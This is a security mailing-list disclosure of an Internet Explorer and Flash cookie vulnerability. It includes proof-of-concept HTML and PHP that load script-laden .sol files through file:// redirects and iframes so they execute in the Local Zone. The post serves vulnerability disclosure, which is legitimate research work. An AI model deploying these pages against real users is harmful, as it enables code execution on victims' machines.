|
After I reported the Content-Location Vulnerability (http://www.securityfocus.com/archive/1/342317), Thor Larholm explained that the html execution was not caused by the Content-Location header, but instead by the triple slash (file:///). I have tested it with double slash and I even tested the triple slash without the Content-Location header, but neither worked. The difference between triple slash and double slash is that in triple htm.html loads the cookie in the iframe, and with double slash it causes the whole page to try and load the cookie which would then require the user to press Back and then refresh the page. I have created 2 proof-of-concepts which show how both vulnerabilities can not be exploited separately. 1. http://mlsecurity.com/ie/wee.php This page will create a flash cookie and when you press continue it will load htm.html which contains an iframe. This iframe will load red.php which contains the Content-Location header pointing at the flash cookie. The flash cookie location will only have a double slash (file://). wee.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol htm.html ****************************** <html> <script type="text/javascript" src="querystring.js"></script> <script> document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D" + QueryString['a'] + "%26drive%3D" + QueryString['drive'] + "%22%3E%3C/iframe%3E")); </script> <br><p> Sometimes the iframe doesn't load properly. If the iframe shows a white blank page then press refresh. <p> You will know when the exploit worked when the iframe shows weird stuff like my_Array0Sven1kelor2. <p> The script assumes you are under windows 2000/XP logged on as administrator.<br> If you are not logged on as administrator type the username you're logged in under in the box below and press Go Go Go.<p> <form method="GET"> Logged on to windows as user: <input type=text name="a" value="administrator"><br> Windows is installed on drive: <input type=text name="drive" value="C"><br> <input type=submit value="Go Go Go"> </form> <p> This should create a file called mlsecurity.txt in your c:\ drive. <p> <a href="exp.php">How it works?</a> </html> ****************************** red.php ****************************** $a = $_GET["a"]; if(!$a || $a=="undefined") { $a="administrator"; } if($_GET["drive"] && !strstr($_GET["drive"],"unde")) { $d=$_GET["drive"]; }else { $d="C"; } header("Location: file://".$d.":/Documents and Settings/".$a."/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"); ****************************** 2. http://mlsecurity.com/ie/ie.php This proof-of-concept only uses the triple slash method to open the cookie in an iframe. ie.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol htm2.html ****************************** <html> <iframe src="file:///C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"></iframe> <p> Note: you might need to edit the html to fit your system. <p> Macromedia Flash Player is reported to store Flash cookies (.sol files) in a predictable location on client systems. Other attacks are possible given the ability to store content on a system in a predictable location, such as referencing the content via a file:// URI. This is compounded by the fact that an attacker could include HTML and script code in the cookie, which may be interpreted by Internet Explorer or possibly other browsers. In the example of Internet Explorer, such content would be interpreted in the context of the Local Zone. Successful exploitation would still require the attacker to guess the local username of the victim. <br> <br>This issue is reported to affect versions of the player for Microsoft Windows operating systems. Other versions may also be affected. Macromedia Director MX is similarly affected. <br> <br>This issue was originally covered by Securityfocus.com BID 8886 but has been determined to be a distinct issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with additional technical details describing a new issue in Internet Explorer. The original report for these issues was a proof-of-concept provided by Mindwarper which exploited both of the issues simultaneously. <p> - Discovered by Mindwarper<br> </html> ****************************** I have tested these pages on both win2k sp4 ie6 fully patched and on winXP. I even tried using a few IE hacks and it still worked. -----------------------------| - Mindwarper | - mindwarper@linuxmail.org | - http://mlsecurity.com | -----------------------------| -- ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze